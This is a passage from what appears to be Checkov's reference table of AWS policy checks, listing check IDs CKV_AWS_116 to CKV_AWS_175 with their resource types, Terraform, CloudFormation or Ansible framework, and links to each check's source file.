Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | -| 450 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | -| 451 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | -| 452 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | -| 453 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | -| 454 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 455 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 456 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 457 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) | -| 458 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | -| 459 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | -| 460 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | -| 461 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | -| 462 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | -| 463 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | -| 464 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | -| 465 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | -| 466 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | -| 467 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | -| 468 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | -| 469 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | -| 470 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | -| 471 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) | -| 472 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 473 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 474 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 475 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 476 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | -| 477 | CKV_AWS_135 | resource | [?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 478 | CKV_AWS_135 | resource | [?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 479 | CKV_AWS_135 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 480 | CKV_AWS_135 | resource | [].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 481 | CKV_AWS_135 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 482 | CKV_AWS_135 | resource | [].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 483 | CKV_AWS_135 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 484 | CKV_AWS_135 | resource | [].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 485 | CKV_AWS_135 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 486 | CKV_AWS_135 | resource | [].tasks[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 487 | CKV_AWS_135 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 488 | CKV_AWS_135 | resource | [].tasks[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 489 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 490 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 491 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 492 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | -| 493 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | -| 494 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) | -| 495 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | -| 496 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 497 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 498 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | -| 499 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | -| 500 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | -| 501 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | -| 502 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | -| 503 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | -| 504 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 505 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 506 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 507 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 508 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | -| 509 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | -| 510 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | -| 511 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) | -| 512 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | -| 513 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 514 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 515 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 516 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 517 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | -| 518 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) | -| 519 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | -| 520 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | -| 521 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | -| 522 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | -| 523 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | -| 524 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) | -| 525 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | -| 526 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | -| 527 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | -| 528 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | -| 529 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) | -| 530 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | -| 531 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) | -| 532 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | -| 533 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) | -| 534 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | -| 535 | CKV_AWS_163 | resource | AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) | -| 536 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | -| 537 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) | -| 538 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | -| 539 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) | -| 540 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | -| 541 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) | -| 542 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | -| 543 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | -| 544 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 545 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 546 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | -| 547 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) | -| 548 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | -| 549 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | -| 550 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 551 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 552 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 553 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 554 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 555 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 556 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | -| 557 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 558 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 559 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | 